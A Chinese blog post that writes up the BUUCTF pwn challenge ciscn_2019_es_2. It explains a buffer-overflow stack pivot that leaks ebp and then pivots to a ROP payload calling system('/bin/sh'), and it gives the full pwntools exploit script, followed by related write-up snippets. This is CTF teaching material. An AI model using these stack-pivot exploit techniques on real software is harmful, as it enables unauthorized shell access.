BUUCTF ciscn_2019_es_2

最新推荐文章于 2025-04-19 18:46:35 发布
最新推荐文章于 2025-04-19 18:46:35 发布
阅读量526 收藏 6
点赞数 23
分类专栏: 栈迁移 文章标签: 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_85052854/article/details/146401773
版权

拿到题目,依然是放入ida反汇编

 可以看到里面有用在vul里,有两个read函数进行栈溢出

 填满s的需要0x28个字节,而read里面只能写入0x30个字节,很明显构造不了完整的rop链,但是他有两个read可以进行输入,于是我们可以通过”栈迁移“方式进行攻击

1.首先我们需要泄露出栈的地址,我们才可以迁移到写入的rop链的地址,这里通过第一个read填满s的ebp,但是不能覆盖到ret,此时可以把ebp的地址给顺便带出来

payload=b'a'*(0x26)+b'b'
p.recvuntil(b'name?')
p.sendline(payload)
p.recvuntil(b'b\n')
ebp = u32(p.recv(4))

为什么填满ebp是0x26+1呢,这样不是0x27没覆盖完吗?这里我用的是sendline()自带一个换行符,所以刚刚好位0x28,完全覆盖ebp

 这里通过泄露ebp的地址且接收该地址,为的就是计算出该ebp地址与栈地址的固定偏移量,这里我们进入pwndbg进行调试

 可以看到我们无论泄露多少次的地址,都跟我们首先输入的“aaaa”的地址的偏移量为0x38,所以只要我们将泄露出来的地址减去0x38就是我们写入栈上的地址,所以我们在第二个read里面就可以进行栈迁移

stack_addr=ebp-0x38
payload=p32(0)+p32(elf.sym['system'])+p32(0)+p32(stack_addr+0x10)+b'/bin/sh'
payload=payload.ljust(0x28,b'\x00')
payload+=p32(stack_addr)+p32(leave)
p.recv()
p.sendline(payload)

我们给到的程序中有system的函数,但是没有/bin/sh这样的字符串,所以我们不需要去泄露libc的基地址,只需要在栈上输入“bin/sh”再计算出bin/sh的地址即可,由于我们是栈迁移到原来的栈上去执行我们的rop链,所以依然要将ebp覆盖完且需要在ebp上写入我们的栈地址所以会用到payload.ljust(0x28,b'\x00'),前面的p32(0)也是为了应对pop ebp留出来的地方,这样就会直接调用system来获取shell了

以下是完整的exp

from pwn import*
#p=remote('node5.buuoj.cn',29059)
p=process("./aaa")
elf=ELF("./aaa")
payload=b'a'*(0x26)+b'b'
p.recvuntil(b'name?')
p.sendline(payload)
p.recvuntil(b'b\n')
ebp = u32(p.recv(4))
print(hex(ebp))
gdb.attach(p)
leave=0x08048562
stack_addr=ebp-0x38
payload=p32(0)+p32(elf.sym['system'])+p32(0)+p32(stack_addr+0x10)+b'/bin/sh'
payload=payload.ljust(0x28,b'\x00')
payload+=p32(stack_addr)+p32(leave)
p.recv()
p.sendline(payload)
p.interactive()

BUUCTF栈迁移ciscn_2019_es_2
Rt1Text的博客
04-09 1128
1.checksec+运行获取基本信息 32位+NX堆栈不可执行 2.常规IDA操作 1.main函数 并没有什么 2.int vul()函数 程序主体,信息很多 1.两次read都在往同一个地方s处读入数据 2.要读入0x30,但s大小只有0x28,如果有后门函数,直接常规栈溢出操作 但是shift+f12 这里仅仅是打印flag字符串,没有用 同时查看hack函数 system里面的参数不是bin_sh不能直接用,所以要修改system的参数 但是...
[BUUCTF]-PWN:ciscn_2019_es_7解析(系统调用execve,srop)
2301_79326813的博客
01-30 523
这道题好像和buu的ciscn_2019_s_3是一模一样的看保护64位,没开canary和pie看ida题目还有能往rax传递0x3B和0xf的函数,这就提示我们可以用系统调用来getshell。
[PWN] BUUCTF ciscn_2019_es_2
空城惜梦的博客
06-20 1489
[PWN] BUUCTF ciscn_2019_es_2解题分析漏洞利用payload解析程序执行过程图参考: 解题分析 按照惯例checksec一下,开了NX与RELRO 运行程序,查看逻辑,两次input,并且回显Hello,input 32位IDA打开,查看关键函数vul(),发现两次read往s里写内容,read可写0x30个字节,但s的缓冲区只有0x28个字节,所以这里存在着栈溢出,若有backdoor直接获得flag的话,可直接构造 payload=0x28*‘a’+ebp+backdoo
【栈迁移】[BUUCTF]ciscn_2019_es_2
s_hiy_iyi的博客
04-01 439
0x30字节数据给s,s大小是0x28,只能溢出0x8字节,刚好覆写ebp和ret。ret的栈劫持去到参数s的栈,让它去执行我们布置在栈上的system(‘/bin/sh’)来获取shell。第二次直接往栈上写入后门 函数 system(‘/bin/sh’),之后利用leave;第一次输入来泄露程序里的ebp地址,知道了ebp的地址就能够推算出参数s在栈上的地址。如果我们输入的内容正好把ebp前面的区域完全覆盖,这样就没法在末尾补上’\0‘,可以将rop链写到栈上,再将栈劫持到我们写的地方就可以了。
buuctf25 ciscn_2019_es_2 1
weixin_74861133的博客
11-14 117
在上图中的Payload中, vuln 函数正常执行到leave指令时, ebp 寄存器将被赋予 ebp0 -0x38,而之后执行 ret(即第二个 leave ret)时, esp 将随之被覆盖为该值,因此该payload已然能实现将 esp 劫持至 ebp0 -0x38处的栈迁移效果了。上图中,栈迁移的最后一个 pop eip 执行结束后, esp 将指向 aaaa 后的内容开始执行,故此处要填上 system 函数地址,那么后面则应为一个 fake ebp 来维持栈操作的完整性。
【PWN · 栈迁移】[BUUCTF]ciscn_2019_es_2
Mr_Fmnwon的博客
07-30 671
当前溢出可用空间比较少时(极端情况下仅能覆写ebp和ret),可以通过栈迁移的方式,扩大shellcode的容纳空间,其核心是将esp移动到一段shellocode开头。而esp总是由ebp赋值,所以总是通过两次leave;ret的方式修改esp到固定位置。一、代码审计有两次读入操作。read进的内容超过字符串的长度,存在栈溢出漏洞。然而计算溢出长度,发现只有8字节,即刚好可以覆写ebp和ret。发现system的函数(意味着plt对应的表项存在),然而这个hack函数并不能给出flag。
buuctf ciscn_2019_es_2 栈迁移(二)
weixin_45441024的博客
12-10 354
buuctf ciscn_2019_es_2 栈迁移(二) 相关的方法和步骤在后面注明 from pwn import * proc_name = '/home/pwn/Desktop/ciscn_2019_es_2' p = remote('node3.buuoj.cn', 27732) elf = ELF(proc_name) system_plt = elf.plt['system'] main_addr = elf.sym['main'] leave_ret = 0x80484b8 log.in
ciscn_2019_es_2BUUCTF
qq_41696518的博客
09-02 1068
与往常溢出不同的是,该溢出仅仅只能溢出8(0x30-0x28)字节的数据,恰好就是覆盖ebp和ret地址数据,并且存在两处溢出漏洞。因此可以用read函数将system(“/bin/sh”)读到当前栈中,并返回让其执行该函数即可。这里有两个问题,1.system(“/bin/sh”)存储地址如何得知 2. 如何返回该system地址执行函数。
[BUUCTF]-PWN:ciscn_2019_es_2解析(栈迁移)
2301_79326813的博客
12-11 1609
答:先说明一点,我们第二次构造payload时往ebp填入ebp-0x38是为了让它在执行完函数原有的leave,ret之后ebp指向b'a'*4的头地址,但要注意这里不是输入ebp-0x28,因为第一个printf打印出来的是ebp里的内容而不是ebp的地址,通过动态调试可以知道ebp里面的内容是ebp+0x10的地址,我们打印出来的就是ebp+10的地址,这里就要填入ebp-0x38才能使ebp指向b'a'*4的头。答:首先要明白32位是通过栈传参的,这样的形式是32位的调用函数的调用规则。
[BUUCTF]ciscn_2019_es_7(SROP)
zyxx_wjc的博客
07-12 413
[BUUCTF]ciscn_2019_es_7
[BUUCTF]-PWN:ciscn_2019_es_1解析(tcachebin duf)
2301_79326813的博客
02-17 377
查看保护再查看ida大致为alloc创建堆块,free释放堆块,show输出堆块内容但是要注意一点free没有清空堆块指针。
BUUCTF-PWN刷题记录-5(Tcache)
weixin_44145820的博客
04-13 1568
目录ciscn_2019_final_3[V&N2020 公开赛]easyTHeap ciscn_2019_final_3 只有添加和删除两个功能 限制了申请的大小,最大为0x78,意味着chunk最大为0x80,添加完可以泄露堆上的地址 free之后没有置空,可以double free 题目分析差不多就这样,下面是漏洞利用: 先申请一个大小为0x78的heap[0],记录下返回地...
BUUCTF-PWN刷题记录-12
weixin_44145820的博客
04-23 812
ciscn_2019_sw_1 一道思路比较独特的格式化字符串漏洞题目 main函数中只有一次利用漏洞的机会 有system的got表项 一个可行思路是把printf的GOT改为system@plt,然后输入/bin/sh,但是考虑到只有一次机会就比较困难 所以我们需要一个能让main多次执行的办法 这时我们只要把main的地址填入finit_array就能无限循环main函数了 简单介绍一...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8673
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
解决Windows安全中心显示空白页面
XdecadeXXX的博客
04-18 479
Windows安全中心
实现Azure Data Factory安全地请求企业内部API返回数据
最新发布
weixin_30777913的博客
04-19 700
需要配置一个Web Activity组件在Azure云上的Azure Data Factory运行,它需要访问企业内部的API获取JSON格式的数据,企业有网关和防火墙,API有公司的okta身份认证,通过公司的域账号来授权访问,现在需要创建一个专用的域账号,让Web Activity组件访问Azure Key Vault,来获取账号密码,然后通过配置访问公司内部API的数据,请写出所有的开发配置步骤,以及完成这一功能的所有的Python源代码,需要确保安全性和可靠性。
安全教育知识竞赛答题小程序怎么做
suncentwl的博客
04-16 441
界面设计:设计简洁、美观、易用的界面,注重色彩搭配、布局排版、字体选择等细节,以提升用户体验。创建小程序项目:打开微信开发者工具,新建小程序项目,填写小程序的基本信息,如名称、appid、项目目录等。需求分析:明确小程序的功能需求,如用户注册与登录、题库管理、答题功能、成绩排名、数据统计等。数据统计与分析:收集用户的答题数据,如答题时间、正确率、得分等,进行统计和分析,了解用户的答题习惯和薄弱环节。用户注册与登录:利用微信提供的登录接口,实现用户的注册与登录功能,获取用户的基本信息,如昵称、头像等。
美国国土安全部终止资助,CVE漏洞数据库项目面临停摆危机
FreeBuf_的博客
04-16 666
美国非营利研发组织MITRE宣布,其与美国国土安全部(DHS)签订的"通用漏洞披露(CVE)"数据库维护合同将于2025年4月16日午夜到期。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值